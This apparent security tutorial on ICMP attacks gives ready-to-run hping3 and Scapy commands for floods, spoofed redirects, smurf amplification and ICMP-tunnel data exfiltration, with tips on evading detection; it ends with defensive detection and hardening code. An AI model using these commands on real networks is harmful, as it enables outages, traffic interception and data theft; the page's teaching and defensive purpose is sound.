ICMP Attacks

Understanding ICMP Attacks - Control Protocol Exploitation

What are ICMP Attacks?

Simple Definition: ICMP attacks exploit the Internet Control Message Protocol to manipulate network routing, overwhelm systems with traffic, or gather intelligence about network infrastructure by abusing messages meant for network diagnostics and error reporting.

Technical Definition: ICMP attacks leverage Internet Control Message Protocol vulnerabilities to perform reconnaissance, traffic redirection, denial of service, or network topology manipulation through crafted ICMP messages that exploit trust relationships in network protocol implementations.

Why ICMP Attacks Work

ICMP attacks succeed due to protocol design characteristics and implementation weaknesses:

  • Administrative Trust: ICMP messages are often trusted as legitimate network management traffic
  • No Authentication: ICMP protocol lacks authentication mechanisms for message validation
  • Automatic Processing: Systems automatically process many ICMP message types without verification
  • Routing Integration: ICMP redirect messages can modify system routing tables dynamically

Attack Process Breakdown

Normal ICMP Operation

  1. Error Reporting: Network devices send ICMP messages to report delivery problems
  2. Path Discovery: Systems use ICMP for MTU discovery and route optimization
  3. Network Diagnostics: Administrators use ping and traceroute for troubleshooting
  4. Router Communication: Devices exchange ICMP redirects for routing efficiency

ICMP Attack Exploitation

  1. Message Crafting: Attacker creates malicious ICMP packets with specific types and codes
  2. Target Injection: Send crafted messages to victims or intermediate systems
  3. System Response: Targets process ICMP messages and modify behavior accordingly
  4. Attack Achievement: Accomplish reconnaissance, DoS, or traffic redirection objectives

Real-World Impact

Network Reconnaissance: Discover active hosts, network topology, and system information through ICMP probing

Traffic Redirection: Force victims to route traffic through attacker-controlled systems using ICMP redirects

Denial of Service: Overwhelm targets with ICMP flood attacks or exhaust resources through protocol abuse

Firewall Bypass: Use ICMP tunneling to bypass network security controls and establish covert channels

Router Manipulation: Modify routing tables on network devices through crafted ICMP messages

Technical Concepts

ICMP Message Structure

ICMP Header Components:

  • Type: Message category (8 bits)
  • Code: Specific message subtype (8 bits)
  • Checksum: Header integrity verification (16 bits)
  • Rest of Header: Type-specific data (32 bits)

Common ICMP Message Types

  • Type 0 - Echo Reply: Response to ping requests
  • Type 3 - Destination Unreachable: Various unreachability conditions
  • Type 5 - Redirect: Route change notifications
  • Type 8 - Echo Request: Ping request messages
  • Type 11 - Time Exceeded: TTL expiration notifications
  • Type 30 - Traceroute: Path discovery messages

Attack Categories

  • Information Gathering: Host discovery, OS fingerprinting, network mapping
  • Traffic Manipulation: Routing redirection, man-in-the-middle positioning
  • Denial of Service: Bandwidth exhaustion, resource depletion
  • Covert Communications: Data exfiltration, command and control channels

Technical Implementation

Prerequisites

Network Requirements:

  • Raw socket access for ICMP packet crafting
  • Understanding of target network topology
  • Knowledge of ICMP filtering policies

Essential Tools:

  • Hping3: Advanced ICMP packet crafting and flooding
  • Nmap: ICMP-based host discovery and OS detection
  • Scapy: Custom ICMP packet creation and analysis
  • Ping: Basic ICMP echo request testing

Essential Command Sequence

Step 1: ICMP Reconnaissance and Host Discovery

# Basic host discovery using ICMP
nmap -sn 192.168.1.0/24
# -sn: Host discovery without port scanning
# Uses ICMP echo requests to identify active hosts
# Reveals network topology and responsive systems

# ICMP timestamp request for information gathering
hping3 -c 1 -C 13 192.168.1.100
# -C 13: ICMP timestamp request (Type 13)
# Reveals system time and timezone information
# Can identify system type and configuration

# ICMP address mask request
hping3 -c 1 -C 17 192.168.1.100
# -C 17: ICMP address mask request (Type 17)
# May reveal subnet mask information
# Useful for network topology discovery

Purpose: Gather intelligence about target networks and identify systems that respond to various ICMP message types.

Step 2: ICMP Flood Attacks

# Basic ICMP flood (ping flood)
hping3 -1 --flood 192.168.1.100
# -1: ICMP mode
# --flood: Send packets as fast as possible
# Overwhelms target with ICMP echo requests

# Controlled ICMP flood with specific rate
hping3 -1 -i u100 192.168.1.100
# -i u100: Send packet every 100 microseconds
# More controlled than --flood option
# Allows fine-tuning of attack intensity

# Large ICMP packet flood
hping3 -1 -d 65500 192.168.1.100
# -d 65500: Maximum payload size
# Forces target to process large packets
# Increases resource consumption per packet

Purpose: Test target system resilience to ICMP-based denial of service attacks.

Step 3: ICMP Redirect Attacks

# ICMP redirect to change victim's routing
hping3 -c 1 -C 5 -K 1 -a 192.168.1.1 192.168.1.100
# -C 5: ICMP redirect message (Type 5)
# -K 1: Redirect code (host redirect)
# -a: Spoof source as legitimate gateway
# Forces victim to route traffic through attacker

# Monitor routing table changes on victim
# From victim system:
route -n
# Check for new routes added by ICMP redirects
# Verify redirection effectiveness

Custom ICMP Redirect with Scapy:

#!/usr/bin/env python3
from scapy.all import *

# Craft ICMP redirect packet
redirect = IP(src="192.168.1.1", dst="192.168.1.100")/\
           ICMP(type=5, code=1, gw="192.168.1.50")/\
           IP(src="192.168.1.100", dst="8.8.8.8")/\
           ICMP()

# Send redirect to victim
send(redirect)

Step 4: ICMP Unreachable Attacks

# Destination unreachable to break connections
hping3 -c 5 -C 3 -K 4 192.168.1.100
# -C 3: Destination unreachable (Type 3)
# -K 4: Port unreachable code
# Disrupts UDP-based communications

# Host unreachable to isolate systems
hping3 -c 1 -C 3 -K 1 -a 192.168.1.1 192.168.1.100
# -K 1: Host unreachable code
# Spoofed from gateway to appear legitimate
# May cause systems to mark routes as down

Step 5: ICMP Tunneling and Covert Channels

# ICMP tunnel for data exfiltration
# Using ptunnel (if available)
ptunnel -p 192.168.1.100 -lp 8080 -da 10.0.0.100 -dp 80
# -p: Proxy server (compromised host)
# Tunnels traffic through ICMP packets
# Bypasses firewalls that allow ICMP

# Manual ICMP data transmission
echo "SECRET_DATA" | hping3 -1 -E /dev/stdin 192.168.1.100
# -E: Read data from file/stdin
# Embeds data in ICMP payload
# Simple covert channel implementation

Custom ICMP Data Exfiltration:

#!/usr/bin/env python3
from scapy.all import *
import base64

# Encode data in ICMP packets
secret_data = "Sensitive information"
encoded_data = base64.b64encode(secret_data.encode()).decode()

# Split data across multiple ICMP packets
chunk_size = 32
for i in range(0, len(encoded_data), chunk_size):
    chunk = encoded_data[i:i+chunk_size]
    packet = IP(dst="192.168.1.100")/ICMP()/chunk
    send(packet)

Attack Variations

ICMP Fragmentation Attacks

# Fragmented ICMP for evasion
hping3 -1 -f -d 1500 192.168.1.100
# -f: Fragment packets
# Large fragmented ICMP packets
# May bypass simple packet filters

# Overlapping fragment attack
hping3 -1 --frag 8 -d 1000 192.168.1.100
# --frag 8: Set fragment offset
# Create overlapping fragments
# Exploit reassembly vulnerabilities

ICMP Amplification Attacks

# Smurf attack using broadcast
hping3 -1 -a 192.168.1.100 192.168.1.255
# Spoof victim's IP as source
# Send to broadcast address
# All hosts reply to victim (amplification)

# Directed broadcast attack
for net in 192.168.{1..10}.255; do
    hping3 -c 1 -1 -a 192.168.1.100 $net
done
# Target multiple broadcast addresses
# Maximize amplification effect

OS Fingerprinting via ICMP

# ICMP-based OS detection
nmap -O --osscan-guess 192.168.1.100
# Uses ICMP responses for OS identification
# Analyzes TTL, window size, and response patterns

# Manual ICMP fingerprinting
hping3 -c 1 -1 192.168.1.100
# Analyze TTL values:
# Linux: 64, Windows: 128, Cisco: 255
# Response timing and patterns reveal OS type

Common Issues and Solutions

Problem: ICMP packets blocked by firewall

  • Solution: Try different ICMP types, use fragmentation, or tunnel through allowed protocols

Problem: No response to ICMP redirects

  • Solution: Verify target accepts redirects, ensure spoofed source is trusted gateway

Problem: ICMP flood not effective

  • Solution: Increase packet rate, use larger payloads, or coordinate from multiple sources

Problem: Covert channel detected

  • Solution: Reduce transmission frequency, vary packet sizes, encrypt payloads

Advanced Techniques

ICMP Route Manipulation

# Create routing loops with ICMP redirects
hping3 -c 1 -C 5 -K 1 -a 192.168.1.1 192.168.1.100 &
hping3 -c 1 -C 5 -K 1 -a 192.168.1.100 192.168.1.1 &
# Create mutual redirects between systems
# Can cause routing loops and network disruption

Time-Based ICMP Attacks

# ICMP timestamp manipulation
# Craft packets with modified timestamps
# Can affect time-sensitive applications
# Useful for protocol-specific attacks

# Delayed ICMP responses
hping3 -1 -i 60 192.168.1.100
# -i 60: 60-second intervals
# Slow, stealthy reconnaissance
# Avoids triggering rate-limiting

Multi-Protocol ICMP Integration

# Combine ICMP with other protocols
# Use ICMP for reconnaissance
nmap -sn 192.168.1.0/24
# Follow with TCP scanning on discovered hosts
nmap -sS $(nmap -sn 192.168.1.0/24 | grep -oP '\d+\.\d+\.\d+\.\d+')

Detection and Prevention

Detection Indicators

  • Unusual ICMP traffic patterns or volumes
  • ICMP packets with suspicious source addresses
  • Unexpected routing table changes
  • ICMP packets containing non-standard payloads
  • High-rate ICMP traffic from single sources
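The header layout from ICMP Message Structure and the detection indicators just listed, as an added example that is not part of the original page: a minimal ICMP parser/builder with checksum verification, and detection logic run over a constructed sample window. The trusted gateway set and the per-window rate threshold are assumed inputs, and the ping-filler check models Linux ping only.

```python
import struct
from collections import Counter

def icmp_checksum(data: bytes) -> int:
    """RFC 1071 one's-complement sum over the whole ICMP message."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return ~total & 0xFFFF

def build_icmp(itype, code, rest=0, payload=b""):
    """Type (8) | code (8) | checksum (16) | rest of header (32), then payload."""
    csum = icmp_checksum(struct.pack("!BBHI", itype, code, 0, rest) + payload)
    return struct.pack("!BBHI", itype, code, csum, rest) + payload

def parse_icmp(msg: bytes) -> dict:
    """Header fields; checksum_ok means the sum over the received bytes is zero."""
    itype, code, _, rest = struct.unpack("!BBHI", msg[:8])
    return {"type": itype, "code": code, "rest": rest, "payload": msg[8:],
            "checksum_ok": icmp_checksum(msg) == 0}

def standard_ping_payload(payload: bytes) -> bool:
    """Stock Linux ping filler: an 8-byte timeval, then 0x10, 0x11, ... upward
    (assumption: other ping implementations are not modelled here)."""
    body = payload[8:]
    return bool(body) and all(b == (0x10 + i) & 0xFF for i, b in enumerate(body))

def analyze(packets, trusted_gateways, rate_threshold=100) -> list:
    """packets: (src_ip, icmp_bytes) pairs from one time window -> alert strings."""
    alerts, per_src = [], Counter()
    for src, raw in packets:
        p = parse_icmp(raw)
        per_src[src] += 1
        if p["type"] == 5 and src not in trusted_gateways:
            gw = ".".join(map(str, struct.pack("!I", p["rest"])))  # redirect gateway
            alerts.append(f"{src}: redirect to {gw} from a non-gateway source")
        if p["type"] in (0, 8) and not standard_ping_payload(p["payload"]):
            alerts.append(f"{src}: non-standard echo payload ({len(p['payload'])} bytes)")
    alerts += [f"{s}: {n} ICMP packets in window (flood?)"
               for s, n in per_src.items() if n >= rate_threshold]
    return alerts

# Constructed sample window (not a capture): stock Linux ping, redirect from a non-gateway, base64 in an echo request, one high-rate source.
LINUX_PING = build_icmp(8, 0, 0x00010001, b"\x00" * 8 + bytes(range(0x10, 0x40)))
SAMPLE = [("192.168.1.20", LINUX_PING),
          ("192.168.1.50", build_icmp(5, 1, 0xC0A80132, b"\x45" + b"\x00" * 27)),
          ("192.168.1.77", build_icmp(8, 0, 0, b"U2Vuc2l0aXZlIGluZm9ybWF0aW9u"))]
SAMPLE += [("10.0.0.9", LINUX_PING)] * 150
```

`analyze(SAMPLE, {"192.168.1.1"})` returns three alerts for the constructed window: the redirect from 192.168.1.50, the base64-carrying echo request, and the 150-packet source.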

Prevention Measures

Network Configuration:

  • Disable ICMP redirects on hosts and routers
  • Implement ICMP rate limiting
  • Filter unnecessary ICMP types at network borders
  • Block ICMP to/from external networks when not needed

Monitoring and Alerting:

  • Log and analyze ICMP traffic patterns
  • Monitor for routing table changes
  • Detect ICMP flood attacks with rate thresholds
  • Analyze ICMP payload content for covert channels

System Hardening:

  • Configure systems to ignore ICMP redirects
  • Implement proper ICMP filtering on firewalls
  • Use stateful inspection for ICMP traffic
  • Deploy intrusion detection systems with ICMP analysis
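The Network Configuration and System Hardening items above (ignore ICMP redirects, rate limiting, no broadcast echo replies) as an added example that is not part of the original page: an audit of the Linux sysctl keys that implement them, with the weak snapshot beside the corrected /etc/sysctl.d lines. The baseline values and the constructed `WEAK_HOST` snapshot are assumptions for a host, not a router.

```python
from pathlib import Path

# Linux sysctl keys that close the ICMP abuses above, with the value this check
# expects on a host (a router that must emit redirects needs a different baseline).
ICMP_HARDENING = {
    "net.ipv4.conf.all.accept_redirects": "0",    # ignore ICMP redirects (type 5)
    "net.ipv4.conf.all.secure_redirects": "0",    # ...even when from a listed gateway
    "net.ipv4.conf.all.send_redirects": "0",      # a host should not emit redirects
    "net.ipv4.icmp_echo_ignore_broadcasts": "1",  # no reply to broadcast echo (smurf)
    "net.ipv4.conf.all.rp_filter": "1",           # drop packets with spoofed sources
}
RATELIMIT_KEY = "net.ipv4.icmp_ratelimit"  # ms between rate-limited ICMP sends; 0 = off

def sysctl_path(key: str) -> Path:
    """net.ipv4.conf.all.accept_redirects -> /proc/sys/net/ipv4/conf/all/accept_redirects"""
    return Path("/proc/sys") / key.replace(".", "/")

def read_sysctls(keys) -> dict:
    """Live values from /proc/sys; keys absent on this kernel are left out."""
    values = {}
    for key in keys:
        try:
            values[key] = sysctl_path(key).read_text().strip()
        except OSError:
            pass
    return values

def audit_icmp_hardening(current: dict) -> list:
    """(key, current, expected) for every present setting weaker than the baseline."""
    findings = [(k, current[k], want) for k, want in ICMP_HARDENING.items()
                if k in current and current[k] != want]
    if current.get(RATELIMIT_KEY) == "0":
        findings.append((RATELIMIT_KEY, "0", "1000"))  # 1000 ms is the kernel default
    return findings

def sysctl_conf_lines(findings) -> list:
    """Drop-in lines for /etc/sysctl.d/ that correct each finding."""
    return [f"{key} = {want}" for key, _, want in findings]

# Constructed snapshot (not read from a real system) of a host that still accepts
# redirects, answers broadcast pings and has ICMP rate limiting switched off.
WEAK_HOST = {
    "net.ipv4.conf.all.accept_redirects": "1",
    "net.ipv4.conf.all.secure_redirects": "1",
    "net.ipv4.conf.all.send_redirects": "0",
    "net.ipv4.icmp_echo_ignore_broadcasts": "0",
    "net.ipv4.conf.all.rp_filter": "1",
    RATELIMIT_KEY: "0",
}
```

On a live host, `sysctl_conf_lines(audit_icmp_hardening(read_sysctls(list(ICMP_HARDENING) + [RATELIMIT_KEY])))` yields the lines to place in a file under /etc/sysctl.d/; `WEAK_HOST` stands in for that snapshot when the script runs elsewhere.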

Professional Context

Legitimate Use Cases

  • Network Troubleshooting: Testing connectivity and diagnosing network issues
  • Security Assessment: Validating ICMP filtering and response handling
  • Performance Testing: Measuring network latency and MTU discovery
  • Infrastructure Mapping: Understanding network topology and routing

Legal and Ethical Requirements

Authorization: ICMP attacks can disrupt network operations, so explicit permission is required

Scope Limitation: Define acceptable ICMP testing within authorized network segments

Impact Assessment: Document potential for service disruption and routing changes

Monitoring Considerations: Ensure testing doesn’t interfere with legitimate network management


ICMP attacks demonstrate the importance of proper network protocol security and the need for comprehensive filtering and monitoring of control protocol traffic.